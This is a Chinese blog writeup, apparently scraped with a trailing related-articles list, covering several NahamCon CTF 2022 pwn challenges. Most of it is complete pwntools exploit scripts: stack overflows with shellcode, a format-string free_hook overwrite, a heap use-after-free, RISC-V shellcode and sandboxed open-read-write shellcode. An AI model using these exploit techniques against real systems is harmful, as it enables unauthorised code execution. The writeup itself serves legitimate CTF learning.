z1r0.
z1r0.

NahamCon CTF 2022 pwn 部分writeup

NahamCon CTF 2022 pwn 部分writeup

Babiersteps

ret2text

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('challenge.nahamcon.com', 32752)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

shell = 0x4011C9
p1 = b'a' * (0x70 + 8) + p64(shell)
r.sendline(p1)

r.interactive()

Detour

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v4; // [rsp+8h] [rbp-18h] BYREF
  __int64 v5[2]; // [rsp+10h] [rbp-10h] BYREF

  v5[1] = __readfsqword(0x28u);
  printf("What: ");
  __isoc99_scanf("%zu", &v4);
  getchar();
  printf("Where: ");
  __isoc99_scanf("%ld", v5);
  getchar();
  *(_QWORD *)((char *)&base + v5[0]) = v4;
  return 0;
}

任意地址写,控制好index就可以了。这里直接打.fini_array为win函数就行。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('challenge.nahamcon.com', 31704)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

shell = 0x401209

r.sendlineafter('What: ', str(shell))

final_addr = 0x4031C8
r.sendlineafter('Where: ', '-616')

r.interactive()

Babysteps

void ask_baby_name() {
  char buffer[BABYBUFFER];
  puts("First, what is your baby name?");
  return gets(buffer);
}

栈溢出,可以写shellcode,在调试的时候发现输入进去的值被eax所控制,所以直接找个jmp eax的gadgets就行。
还有一种方法是ret2libc,实在想不到的是题目用的2.35的libc。。。。。。。

from pwn import *

context(arch='i386', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('challenge.nahamcon.com', 30796)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

shellcode = asm(shellcraft.sh())
jmp_eax = 0x08049545

p1 = b'a' * (0x18 + 4) + p32(jmp_eax) + shellcode
r.sendline(p1)

r.interactive()

Reading list

int __fastcall print_list(const char *a1)
{
  int i; // [rsp+1Ch] [rbp-4h]

  if ( count )
  {
    printf("%s's reading list\n", a1);
    for ( i = 0; i < count; ++i )
    {
      printf("%d. ", (i + 1));
      printf(heap_ptr[0][i]);
      puts(&byte_20B9);
    }
  }
  else
  {
    puts("No books in the list");
  }
  return puts(&byte_20B9);
}

格式化漏洞,泄露出libc,利用格式化打free_hook为one_gadget即可。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('challenge.nahamcon.com', 31143)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = '> '

def add(name):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Enter the book name: ', name)

def show():
    r.sendlineafter(menu, '1')

def delete(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter(': ', str(index))

def edit(name):
    r.sendlineafter(menu, '4')
    r.sendlineafter('What is your name: ', name)

base_offest = 11
libc_offest = 23

r.sendlineafter('What is your name: ', 'a' * 8)

add('%23$p')
show()
r.recvuntil('1. 0x')
__libc_start_main_addr = int(r.recv(12), 16) - 243
li('__libc_start_main_addr = ' + hex(__libc_start_main_addr))
libc = ELF('./2.31/libc-2.31.so')
libc_base = __libc_start_main_addr - libc.sym['__libc_start_main']
free_hook = libc_base + libc.sym['__free_hook']
one = [0xe3b2e, 0xe3b31, 0xe3b34]
one_gadget = one[1] + libc_base
li('one_gadget = ' + hex(one_gadget))

first = one_gadget - (one_gadget >> 16 << 16)
li('first = ' + hex(first))
second = (((one_gadget >> 16 << 16) - (one_gadget >> 32 << 32)) >> 16)
li('second = ' + hex(second))
third = (one_gadget >> 32)
li('third = ' + hex(third))

p1 = p64(free_hook)+p64(free_hook+2)+p64(free_hook+4)
edit(p1)

p2 = '%' + str(first).rjust(6, '0') + 'c%0022$hn'
li(p2)
add(p2)

p3 = '%' + str(second).rjust(6, '0') + 'c%0023$hn'
add(p3)

p4 = '%' + str(third).rjust(6, '0') + 'c%0024$hn'
add(p4)

delete(1)

r.interactive()

Riscky

NahamCon CTF 2022 pwn 部分writeup_第1张图片
异构pwn,刚好笔者最近在看iot的知识。这里直接用ghidra来反汇编了。
很显眼的栈溢出,但是这个是em_riscv-64-little。有一个heap_ful给了我们是jalr sp,去这里找一个riscv的shellcode然后将shellcode放到sp后面控制返回值执行jalr sp就可以到达shellcode这里了,和x64的jmp rsp差不多。前面需要使用\x00来补,不然会错也可以使用nop。

from pwn import *

context(arch='riscv', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('challenge.nahamcon.com', 30164)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

shellcode = b''
shellcode += b"\x01\x11\x06\xec"
shellcode += b"\x22\xe8\x13\x04"
shellcode += b"\x21\x02\xb7\x67"
shellcode += b"\x69\x6e\x93\x87"
shellcode += b"\xf7\x22\x23\x30"
shellcode += b"\xf4\xfe\xb7\x77"
shellcode += b"\x68\x10\x33\x48"
shellcode += b"\x08\x01\x05\x08"
shellcode += b"\x72\x08\xb3\x87"
shellcode += b"\x07\x41\x93\x87"
shellcode += b"\xf7\x32\x23\x32"
shellcode += b"\xf4\xfe\x93\x07"
shellcode += b"\x04\xfe\x01\x46"
shellcode += b"\x81\x45\x3e\x85"
shellcode += b"\x93\x08\xd0\x0d"
shellcode += b"\x93\x06\x30\x07"
shellcode += b"\x23\x0e\xd1\xee"
shellcode += b"\x93\x06\xe1\xef"
shellcode += b"\x67\x80\xe6\xff"

jal_sp = 0x1060c

p1 = b''
p1 += (520 - 8) * b'\x00'
p1 += p64(jal_sp)
p1 += shellcode

r.sendlineafter('> ', p1)

r.interactive()

Free Real Estate(赛后)

void remove_property()
{
  if ( *(heap_ptr + 6) )
    free(*(heap_ptr + 6));                      // uaf
  if ( *(heap_ptr + 4) )
  {
    free(*(heap_ptr + 4));
    *(heap_ptr + 4) = 0LL;
  }
  free(heap_ptr);
  heap_ptr = 0LL;
}

漏洞点就出在了上面。有一个uaf,这个题目的代码量太大了,感觉就考逆向了。。。逆清楚就能出。这个题目是libc-2.31的所以我们有如下攻击思路
因为有uaf,而这个uaf刚好可以任意申请大小,所以我们可以直接创建一个大的chunk通过unsortedbin来泄露出libc。然后利用uaf,将free_hook放进去,打free_hook为one_gadget即可。这里就不详细说了,看wp

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('challenge.nahamcon.com', 30968)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def add(street_name_size, street_name, comment_size, comment=''):
    r.sendlineafter('> ', '2')
    r.sendlineafter('Enter the house number: ', str(10))
    r.sendlineafter('What is the length of the street name: ', str(street_name_size))
    r.sendlineafter('Enter the street name: ', street_name)
    r.sendlineafter('What is the price of the property?: ', str(10))
    if comment_size == 0:
        r.sendlineafter('Would you like to add a comment for this property? [y/n]: ', 'n')
    else:
        r.sendlineafter('Would you like to add a comment for this property? [y/n]: ', 'y')
        r.sendlineafter('What is the length of the comment?: ', str(comment_size))
        r.sendlineafter('Enter the comment: ', comment)

def edit(street_name_size, street_name, comment_size, comment='', change_comment=False, iob=False):
    r.sendlineafter('> ', '4')
    r.sendlineafter('Would you like to change the house number? [y/n]: ', 'n')
    if street_name_size == 0:
        r.sendlineafter('Would you like to change the street? [y/n]: ', 'n')
    else:
        r.sendlineafter('Would you like to change the street? [y/n]: ', 'y')
        r.sendlineafter('Enter the new street name length: ', str(street_name_size).encode())
        r.sendlineafter('Enter the new street name: ', street_name)
    r.sendlineafter('Would you like to change the price of the property? [y/n]: ', 'n')
    if comment_size == 0:
        r.sendlineafter('Would you like to change the comment? [y/n]: ', 'n')
    else:
        if not change_comment:
            r.sendlineafter('Would you like to add a comment for this property? [y/n]: ', 'y')
            r.sendlineafter('What is the length of the comment?: ', str(comment_size))
            r.sendlineafter('Enter the comment: ', comment)
        else:
            r.sendlineafter('Would you like to change the comment? [y/n]: ', 'y')
            r.sendlineafter('Enter the new comment length: ', str(comment_size))
            if iob:
                return
            r.sendlineafter('Enter the new comment: ', comment)

def delete():
    r.sendlineafter('> ', '3')

def show():
    r.sendlineafter('> ', '1')

def change(name_size, name):
    r.sendlineafter('> ', '5')
    r.sendlineafter('What is the length of your new name?: ', str(name_size))
    r.sendlineafter('Enter your new name: ', name)

r.sendlineafter('Enter your name: ', 'a' * 8)

add(0x10, 'bbbb', 0x427, 'cccc')
edit(0x20, 'dddd', 0)

delete()
add(0x10, 'aaaaa', 0)

show()

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10
li('malloc_hook = ' + hex(malloc_hook))
libc = ELF('./2.31/libc-2.31.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
li('free_hook = ' + hex(free_hook))
system = libc_base + libc.sym['system']
one = [0xe3b2e, 0xe3b31, 0xe3b34]
one_gadget = one[1] + libc_base

change(0x427, 'dddd')
delete()

add(0x89, b'eeee', 0x20, b'ffff')
delete()

add(0x49, b'gggg', 0x49, b'hhhh')
edit(0x59, b'iii', 0)
delete()

add(0x20, b'jjjj', 0)
edit(0, b'kkkk', 0x20, p64(free_hook), True)

edit(0x49, b'a'*0x8, 0)

change(500, p64(0)*31 + p64(0x51))

edit(0x20, b'a'*0x8, 0)

edit(0x49, p64(system), 0)

edit(0, p64(system), 13, b'/bin/sh\x00', True)
edit(0, p64(system), 0x90, b'', True, True)

r.interactive()

Stackless(赛后)

sandbox();

    __asm__ volatile(".intel_syntax noprefix\n"
                     "mov r15, %[addr]\n"
                     "xor rax, rax\n"
                     "xor rbx, rbx\n"
                     "xor rcx, rcx\n"
                     "xor rdx, rdx\n"
                     "xor rsp, rsp\n"
                     "xor rbp, rbp\n"
                     "xor rsi, rsi\n"
                     "xor rdi, rdi\n"
                     "xor r8, r8\n"
                     "xor r9, r9\n"
                     "xor r10, r10\n"
                     "xor r11, r11\n"
                     "xor r12, r12\n"
                     "xor r13, r13\n"
                     "xor r14, r14\n"
                     "jmp r15\n"
                     ".att_syntax"
                     :
                     : [addr] "r"(code));

    return EXIT_SUCCESS;
}

给了源码,可以看到开了沙盒,并且将寄存器全部清0。
我们可以使用open read write,很明显的orw shellcode题目。
首先是open,读flag这个很好操作,open(‘flag.txt’)
接下来就是read了,这个不是很好操作,因为保护全开, 我们需要将flag写入到一个rw的区域。。。
首先第一个想法就是爆破,shellcode里面写入循环然后一直找到可以写的地址。笔者看了一个国外的wp,里面的一个方法很好,利用gdb里面的i all-r来看一下哪些寄存器可以被使用

gef➤  i r xmm0
xmm0           {
  v4_float = {0x41000000, 0x0, 0x0, 0x0},
  v2_double = {0x0, 0x0},
  v16_int8 = {0x10, 0xa4, 0x55, 0x55, 0x55, 0x55, 0x0, 0x0, 0xe0, 0xab, 0xf8, 0xf7, 0xff, 0x7f, 0x0, 0x0},
  v8_int16 = {0xa410, 0x5555, 0x5555, 0x0, 0xabe0, 0xf7f8, 0x7fff, 0x0},
  v4_int32 = {0x5555a410, 0x5555, 0xf7f8abe0, 0x7fff},
  v2_int64 = {0x55555555a410, 0x7ffff7f8abe0},
  uint128 = 0x7ffff7f8abe0000055555555a410
}

heap这里的权限是rw,刚好在v2_int64这个里面,所以我们可以利用xmm0来让shellcode和flag都放入这里的地址。
最后就是常规的write了。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('challenge.nahamcon.com', 31470)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

shellcode = asm(f'''
movq r15, xmm0
sub r15, 0x1000

lea rdi, [rip+flag]
mov rax, {constants.SYS_open}
syscall

mov rdi, rax
mov rsi, r15
mov rdx, 100
mov rax, {constants.SYS_read}
syscall

mov rdx, rax
mov rdi, {constants.STDOUT_FILENO}
mov rax, {constants.SYS_write}
syscall
hlt

flag: .asciz "flag.txt"
''')

r.sendlineafter('Shellcode length', str(len(shellcode)))

r.sendlineafter('Shellcode', shellcode)

r.interactive()

先到这里吧(开溜

你可能感兴趣的:(buuctf,题目,pwn)

  • LeetCode1047:删除字符串中的所有相邻重复项 一个小猴子` LeetCode算法数据结构c++leetcode
    题目描述给出由小写字母组成的字符串S,重复项删除操作会选择两个相邻且相同的字母,并删除它们。在S上反复执行重复项删除操作,直到无法继续删除。在完成所有重复项删除操作后返回最终的字符串。答案保证唯一。示例:输入:“abbaca”输出:“ca”解释:例如,在“abbaca”中,我们可以删除“bb”由于两字母相邻且相同,这是此时唯一可以执行删除操作的重复项。之后我们得到字符串“aaca”,其中又只有“a
  • 华为OD机试 - 单向链表中间节点(Java & JS & Python & C & C++) 华为OD题库 华为od链表java
    须知哈喽,本题库完全免费,收费是为了防止被爬,大家订阅专栏后可以私信联系退款。感谢支持文章目录须知题目描述输出描述解析代码题目描述给定一个单链表L,请编写程序输出L中间结点保存的数据。如果有两个中间结点,则输出第二个中间结点保存的数据。例如:给定L为1→7→5,则输出应该为7;给定L为1→2→3→4,则输出应该为3;输入描述每个输入包含1个测试用例。每个测试用例:第一行给出链表首结点的地址、结点总
  • 【算法分析与设计】去除重复字母 五敷有你 算法分析与设计javajavascript开发语言算法数据结构
    个人主页:五敷有你系列专栏:算法分析与设计⛺️稳中求进,晒太阳题目给你一个字符串s,请你去除字符串中重复的字母,使得每个字母只出现一次。需保证返回结果的字典序最小(要求不能打乱其他字符的相对位置)。示例示例1:输入:s="bcabc"输出:"abc"示例2:输入:s="cbacdcbc"输出:"acdb"思路贪心+单调栈实现【字符串删除一个字符使其字典序最小的贪心策略】:对于两个长度相同的字符串,
  • 没有如释重负 君远近
    虽然只有短短的一个多月的努力复习时间,但今天的整个考试经过,还是发现了效果的,题目做的比较自如,没有慌里慌张,而且提前五分钟完成。至于考试成绩,没有实足的把握,60分都不敢保证。但绝对相信自己,比去年肯定要好!今天早早的赶到考场,见到了刘老师,谈起来学习情况,坦率的说,真的是自己不够重视。总以为会很难,没有信心。其实不是的,只要认真对待,树立足够的信心,绝对可以通过考试的。还向老师询问了,后续再报
  • 大创项目推荐 深度学习 opencv python 公式识别(图像识别 机器视觉) laafeer python
    文章目录0前言1课题说明2效果展示3具体实现4关键代码实现5算法综合效果6最后0前言优质竞赛项目系列,今天要分享的是基于深度学习的数学公式识别算法实现该项目较为新颖,适合作为竞赛课题方向,学长非常推荐!学长这里给一个题目综合评分(每项满分5分)难度系数:3分工作量:4分创新点:4分更多资料,项目分享:https://gitee.com/dancheng-senior/postgraduate1课题
  • 【数据结构】实验一 实现顺序表各种基本运算的算法 张鱼·小丸子 数据结构实验c++数据结构
    题目:实现顺序表各种基本运算的算法要求:1、建立一个顺序表,输入n个元素并输出;2、查找线性表中的最大元素并输出;3、在线性表的第i个元素前插入一个正整数x;4、删除线性表中的第j个元素;5、将线性表中的元素按升序排列;6、将线性表中的元素就地逆序(只允许用一个暂存单元);#include#defineSIZE1000usingnamespacestd;typedefstruct{int*a;//
  • 沟通管理和相关方管理核心考点梳理 WorkLee PMPPMP沟通管理相关方干系人
    个人总结,仅供参考,欢迎加好友一起讨论PMP-沟通管理和相关方管理核心考点梳理沟通管理和相关方(干系人)管理这两章放在一起进行梳理,这两章很多的考点很容易混淆,经常会纠结于一些题目,究竟选择沟通管理还是干系人管理的知识点。沟通管理1)规划沟通管理沟通在PMP中是指信息流的传递,PM是根据谁的需求来确定这种信息流的传递方式、频率,内容、格式呢?解析:规划沟通管理是基于每个相关方或相关方群体的信息需求
  • [高精度加法和乘法] 阶乘之和 StudyingPanda 算法
    题目描述用高精度计算出S=1!+2!+3!+⋯+n!(n≤50)。其中!表示阶乘,定义为n!=n×(n−1)×(n−2)×⋯×1。例如,5!=5×4×3×2×1=120。输入格式一个正整数n。输出格式一个正整数S,表示计算结果。输入输出样例输入#13输出#19解题分析思路很简单,求出阶乘之后再累次求和即可,但是关键在于这个数据量实在是太大了,所以必须封装高精度运算,这里我们创建一个BigInt类,
  • P5635 【CSGRound1】天下第一 golemon. 算法题算法数据结构c++
    P5635【CSGRound1】天下第一-洛谷|计算机科学教育新生态(luogu.com.cn)思路:记忆化搜索,因为模数ppp对于多组输入来说是不变的,那么(x+y)(x+y)%p==0(x+y)这个判定条件在整个程序中都是正确的。题目中,每两个回合是一轮-两人都执行一次。为了让代码好写,每次搜索时是按照一轮来搜索。f[x][y]!=0f[x][y]!=0f[x][y]!=0:之前搜索时已经得到
  • 二叉树|617.合并二叉树 亦小河 算法
    力扣题目链接classSolution{public:TreeNode*mergeTrees(TreeNode*t1,TreeNode*t2){if(t1==NULL)returnt2;if(t2==NULL)returnt1;//重新定义新的节点,不修改原有两个树的结构TreeNode*root=newTreeNode(0);root->val=t1->val+t2->val;root->lef
  • 婚姻 悠悠女子尽开颜
    一直以来都觉得婚姻这个题目太大,不敢轻易碰触,但是昨天文章马伊琍发微博公开离婚消息了,今天看了《如影随心》,都是关乎“婚姻”的,同时也都参杂了“出轨”便想着浅聊几句!其实,文马离婚,没有多少惊讶,也没有多少意外,“破镜难重圆”,毕竟,“出轨”并不是那么容易遗忘和容忍的!很多时候,大家都说“婚姻是爱情的坟墓”,竟然还有小三儿小四来“盗墓”,可是没有“婚姻”爱情却又是没有“归宿”!我们向往爱情,我们同
  • 亲子日记37 HelloFox_447c
    2018年10月31星期三天气晴马上要考试了,孩子们也进入了复习,晚上接到儿子,问了儿子今天在学校都学了什么,儿子说:我们复习了好多好多。回到家,吃过晚饭,让儿子玩了一会开始检查作业,我检查作业的同时让儿子把今天的字练完,然后做了两份前几天买的试题,其他都还好,就是这个阅读题目有待提高王子轩妈妈一年级五班
  • 1.1-数组-704. 二分查找★ 探路人 《数据结构与算法Rust实现》704.二分查找Rust
    704.二分查找★  力扣题目链接,给定一个n个元素有序的(升序)整型数组nums和一个目标值target,搜索nums中的target,如果存在返回下标,否则返回-1。n将在[1,10000]之间。可以假设nums中的所有元素是不重复的。n将在[1,10000]之间。nums的每个元素都将在[-9999,9999]之间。示例1:输入:nums=[-1,0,3,5,9,12],target=9输出
  • PTA天梯赛习题 L2-004 这是二叉搜索树吗? 魔莫摸墨 天梯赛算法数据结构天梯c语言c++
    题目:一棵二叉搜索树可被递归地定义为具有下列性质的二叉树:对于任一结点,其左子树中所有结点的键值小于该结点的键值;其右子树中所有结点的键值大于等于该结点的键值;其左右子树都是二叉搜索树。所谓二叉搜索树的“镜像”,即将所有结点的左右子树对换位置后所得到的树。给定一个整数键值序列,现请你编写程序,判断这是否是对一棵二叉搜索树或其镜像进行前序遍历的结果。输入格式:输入的第一行给出正整数N(≤1000)。
  • 蓝桥杯:数的分解 云格~ 蓝桥杯蓝桥杯算法职场和发展数据结构c语言c++
    题目把2019分解成3个各不相同的正整数之和,并且要求每个正整数都不包含数字2和4,一共有多少种不同的分解方法?注意交换3个整数的顺序被视为同一种方法,例如1000+1001+18和1001+1000+18被视为同一种。思路循环遍历看每个数的每位代码#includeusingnamespacestd;boolcheck(intnum){while(num){intdigit=num%10;if(d
  • 悟空本事练成记,跟吴承恩学写小说系列之二 孙老师的教育观
    点击上方“俊斋说书”,关注后重温经典名著小故事,记得分享噢!导读:孙少不自量力,试图用全新的视角解读西游,是从小说的行文逻辑和做人做事的启示等方面入手的。今天我们来谈谈《西游记》第二回的读书心得。原著第二回的题目叫“悟彻菩提真妙理,断魔归本合元神。”这是四百多年前那会的人写小说最流行的起名方式。时移境迁,到今天我们基本上已不知道是什么意思了。孙少根据第二回的主要内容给它起了个通俗易懂的名字,叫“悟
  • C语言之猴子吃桃 普通的一个普通猿 C语言算法c语言算法开发语言
    目录一简介二代码实现循环实现递归实现三时空复杂度A.循环实现B.递归实现一简介猴子吃桃问题是一个经典的递推算法题目,它描述如下:一只猴子第一天摘下若干个桃子,当天吃掉了所摘桃子数的一半多一个。之后每天早上,猴子都会吃掉前一天剩下桃子数的一半多一个。直到第十天早上,猴子只剩下了一个桃子。二代码实现使用C语言来解决这个问题,可以通过循环或者递归的方式来计算猴子第一天到底摘了多少个桃子。以下是两种方法的
  • 想开了 椰子树下小十一
    图片发自App题目如图上午在朋友店里喝茶,突然之间下起了大雨,商场的顶棚噼里啪啦的响着,不知道的以为外面在下冰雹突然间看到手机群里发来一张照片,就是图片里这张,我看到照片的时候心里暗自窃喜随回复了一句:这棵树,几年了,着实想开了实际的心理是:劳资老早就想砍了你了门前这棵树,从什么时候开始说起呢,早些年一直是在欣赏边上的那颗椰子树,每年还能掉下几颗老椰子,偶尔尝尝鲜,不知道从什么时候开始,边上的景观
  • 代码随想录算法训练营第三十一天|455.分发饼干、376. 摆动序列、 53. 最大子序和 Eugene Tsui 算法
    文档讲解:455.分发饼干、376.摆动序列、53.最大子序和题目链接:455.分发饼干、376.摆动序列、53.最大子序和思路:今天开始了贪心的题目,贪心的题目要么比较简单,要么就很难,找不到头绪,今天的题目还是相对简单一些的。第三题中最难想的一个点就是,如果sum=0;i--){if(cookie>=0&&s[cookie]>=g[i]){res++;cookie--;}}returnres;
  • 洛谷入门——P1150 Peter 的烟 Fiona Tracy c++算法算法c++
    Peter的烟题目背景温馨提醒:吸烟有害健康,请勿尝试吸烟!题目描述Peter有nnn根烟,他每吸完一根烟就把烟蒂保存起来,kkk(k>1k>1k>1)个烟蒂可以换一个新的烟,那么Peter最终能吸到多少根烟呢?与某些脑筋急转弯不同的是,Peter并不能从异次元借到烟蒂,抽完后再还回去。输入格式每组测试数据一行包括两个整数n,kn,kn,k(1usingnamespacestd;intmain()
  • 2024最新华为OD机试试题库全 -【加密算法】- C卷 算法小叮当 华为OD试题练习A+B+C卷华为od加密算法pythonjavac++dfs
    1.题目详情1.1⚠️题目有一种特殊的加密算法,明文为一段数字串,经过密码本查找转换,生成另一段密文数字串。规则如下:明文为一段数字串由0~9组成密码本为数字0~9组成的二维数组需要按明文串的数字顺序在密码本里找到同样的数字串,密码本里的数字串是由相邻的单元格数字组成,上下和左右是相邻的,注意:对角线不相邻,同一个单元格的数字不能重复使用。每一位明文对应密文即为密码本中找到的单元格所在的行和列序号
  • LeetCode_32_困难_最长有效括号 Lins号丹 LeetCode进阶之路leetcode算法
    文章目录1.题目2.思路及代码实现详解(Java)2.1动态规划2.2不需要额外空间的算法1.题目给你一个只包含'('和')'的字符串,找出最长有效(格式正确且连续)括号子串的长度。示例1:输入:s=s=s="(()"输出:222解释:最长有效括号子串是"()"示例2:输入:s=s=s=")()())"输出:444解释:最长有效括号子串是"()()"示例3:输入:s=s=s=""输出:000提示:
  • 中位数贪心 菜菜小堡 算法python数据结构
    (leetcode3086)-------------------Java实现题目表述给你一个下标从0开始的二进制数组nums,其长度为n;另给你一个正整数k以及一个非负整数maxChanges。灵茶山艾府在玩一个游戏,游戏的目标是让灵茶山艾府使用最少数量的行动次数从nums中拾起k个1。游戏开始时,灵茶山艾府可以选择数组[0,n-1]范围内的任何索引index站立。如果nums[index]==
  • 洛谷 1853.投资的最大效益 是小Y啦 算法c++动态规划
    思路:完全背包。首先从题目的分析中我们可以知道,这里的债卷是可以无限次购买的,所以我们可以认定,这是个在选与不选的问题中,而且各个选项都是可以无限次选择的。确定了做法之后,我们需要看到这道题和普通的背包问题不同的地方,那就是我们如果只是写出模板的话,只能得到第一年的最大利润加资产。但是这里有要求说是多少年的。所以我们需要把第一次的数据存储到另一个数组当中,然后再还给他进行更新操作,这样才能在保证第
  • 浅谈前端路由history和hash的理解 怂怂敲代码 前端哈希算法算法
    hash和history在前端面试中是很常考的一道题目,可能很多人对于history和hash的理解差异性就是,他们两者的url字段一个没有#号一个有#号,但是有没有想过为什么这样呢,有无#号又有什么差异呢,这篇文章谈一谈我对前端路由history和hash的理解。hash和history都可以用于前后端分离项目,且两者有各自的特点和各自的使用场景。一、前端路由原理1、SPASPA,即单页面应用(
  • 华为OD机试 C++ -采样过滤 南山0112 华为OD机试C++华为odc++开发语言数据结构算法
    采样过滤前言:本专栏将持续更新互联网大厂机试真题,并进行详细的分析与解答,包含完整的代码实现,希望可以帮助到正在努力的你。关于大厂机试流程、面经、面试指导等,如有任何疑问,欢迎联系我,wechat:steven_moda;email:[email protected];备注:CSDN。题目描述在做物理实验时,为了计算物体移动的速率,通过相机等工具周期性的采样物体移动距离。由于工具故障,采样数据存
  • 慎对面试笔试 狮子亲吻的鹿
    在校园招聘中,前期的校园宣讲、简历收集与筛选过后,就到了非常核心的笔试面试环节。面试笔试题目的设计及实施显然是重中之重。一、试前通知多借外力关于面试和笔试前的通知问题虽然看起来很小却很费精力,甚至会因为通知不到位等原因而导致笔试面试的到场率极低,这会大大降低选择人才的余地。一般来说,公司很少有自行开发的专业的招聘信息管理系统,即便有的话也往往功能非常简单,无法通过系统自动群发短信或邮件通知,常常要
  • 突破编程_C++_查找算法(分块查找) breakthrough_01 突破编程_C++_查找算法算法c++
    1算法题:使用分块算法在有序数组中查找指定元素1.1题目含义在给定一个有序数组的情况下,使用分块查找算法来查找数组中是否包含指定的元素。分块查找算法是一种结合了顺序查找和二分查找思想的算法,它将有序数组划分为若干个块,每个块内的元素不必有序,但块与块之间必须保持有序。首先通过块之间的有序性来快速定位到目标元素可能存在的块,然后在该块内进行顺序查找。1.2示例示例1:输入:有序数组:[1,3,5,7
  • C++ [NOIP2012 普及组] 质因数分解 Z1Jxxx 洛谷c++算法数据结构
    文章目录一、题目描述[NOIP2012普及组]质因数分解题目描述输入格式输出格式样例#1样例输入#1样例输出#1提示二、参考代码一、题目描述[NOIP2012普及组]质因数分解题目描述已知正整数nnn是两个不同的质数的乘积,试求出两者中较大的那个质数。输入格式输入一个正整数nnn。输出格式输出一个正整数ppp,即较大的那个质数。样例#1样例输入#121样例输出#17提示1≤n≤2×1091\len
  • 二月难忘,未来可期 悠之不语斋
    大家好,我是来自河南项城莲溪初级中学的龚淑华,非常荣幸能在这里交流分享,我分享的题目是《二月难忘,未来可期》就在今天冬天,我们美丽的神州大地,上亿万家庭迎来了一场突如其来的没有硝烟的战争,全国各地像按下了暂停键一样,二月,也一改往日的喧嚣,全国人民,同心抗疫。同时,也让我们人类有时间静静的深深的思索,人类需要大自然、大自然不需要人类。人类的确应该敬畏大自然,否则,后果严重的无法想象!在这个二月里,
  • Nginx负载均衡 510888780 nginx应用服务器
    Nginx负载均衡一些基础知识: nginx 的 upstream目前支持 4 种方式的分配 1)、轮询(默认)       每个请求按时间顺序逐一分配到不同的后端服务器,如果后端服务器down掉,能自动剔除。 2)、weight       指定轮询几率,weight和访问比率成正比
  • RedHat 6.4 安装 rabbitmq bylijinnan erlangrabbitmqredhat
    在 linux 下安装软件就是折腾,首先是测试机不能上外网要找运维开通,开通后发现测试机的 yum 不能使用于是又要配置 yum 源,最后安装 rabbitmq 时也尝试了两种方法最后才安装成功 机器版本: [root@redhat1 rabbitmq]# lsb_release LSB Version: :base-4.0-amd64:base-4.0-noarch:core
  • FilenameUtils工具类 eksliang FilenameUtilscommon-io
    转载请出自出处:http://eksliang.iteye.com/blog/2217081 一、概述 这是一个Java操作文件的常用库,是Apache对java的IO包的封装,这里面有两个非常核心的类FilenameUtils跟FileUtils,其中FilenameUtils是对文件名操作的封装;FileUtils是文件封装,开发中对文件的操作,几乎都可以在这个框架里面找到。 非常的好用。
  • xml文件解析SAX 不懂事的小屁孩 xml
    xml文件解析:xml文件解析有四种方式, 1.DOM生成和解析XML文档(SAX是基于事件流的解析) 2.SAX生成和解析XML文档(基于XML文档树结构的解析) 3.DOM4J生成和解析XML文档 4.JDOM生成和解析XML 本文章用第一种方法进行解析,使用android常用的DefaultHandler import org.xml.sax.Attributes;
  • 通过定时任务执行mysql的定期删除和新建分区,此处是按日分区 酷的飞上天空 mysql
    使用python脚本作为命令脚本,linux的定时任务来每天定时执行 #!/usr/bin/python # -*- coding: utf8 -*- import pymysql import datetime import calendar #要分区的表 table_name = 'my_table' #连接数据库的信息 host,user,passwd,db =
  • 如何搭建数据湖架构?听听专家的意见 蓝儿唯美 架构
    Edo Interactive在几年前遇到一个大问题:公司使用交易数据来帮助零售商和餐馆进行个性化促销,但其数据仓库没有足够时间去处理所有的信用卡和借记卡交易数据  “我们要花费27小时来处理每日的数据量,”Edo主管基础设施和信息系统的高级副总裁Tim Garnto说道:“所以在2013年,我们放弃了现有的基于PostgreSQL的关系型数据库系统,使用了Hadoop集群作为公司的数
  • spring学习——控制反转与依赖注入 a-john spring
